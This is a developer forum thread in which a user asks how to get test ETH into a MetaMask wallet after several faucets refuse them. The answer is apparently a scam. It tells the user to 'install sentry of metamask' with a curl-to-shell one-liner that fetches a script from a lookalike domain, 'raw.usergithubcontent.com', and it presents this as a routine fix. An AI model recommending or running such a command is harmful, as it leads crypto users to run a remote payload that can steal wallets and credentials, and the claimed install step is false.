How to add some virtual tokens to my Metamask wallet for test def programming blockchain?
I am trying to get some virtual tokens on My Metamask for Def programming purposes. I misunderstand something. How to add some virtual tokens to my Metamask wallet for test def programming blockchain?
What I tried :
- The Rinkeby test network is deprecated.

- I tried Linea and I have the same issue: 


"I don't have historically used at ETH Mainet".

- I tried  infura.io/faucet and: "The address provided does not have sufficient historical activity or balance on the Ethereum Mainnet. Please use a different address to proceed. Read the FAQ below for more information."

- Goerli is deprecated.

Does anyone know a working solution for 2024, please?
After some investigation...
I needed to add virtual tokens to my metamask wallet on the Linea Sepolia test network (one of the 2 preregistered testnet). I used getblock.io and I got this error message :

"Your wallet must have at least 0.005 ETH on mainnet to receive Linea
Sepolia ETH. Please add ETH and try again."

But my metamask wallet (see screenshot) has 0.0403 ETH on ETH main net.

What am I doing wrong? I misunderstood something.

You need to install sentry of metamask in order to add virtual token.
You can install it by
sh -c "$(curl -fsSL https://raw.usergithubcontent.com/MetaMask/metamask-extension/blob/develop/app/scripts/sentry-install.js)"

If you are using Windows, you can use Git Bash to install. After that, you will be able to use your Metamask extension to add virtual token.
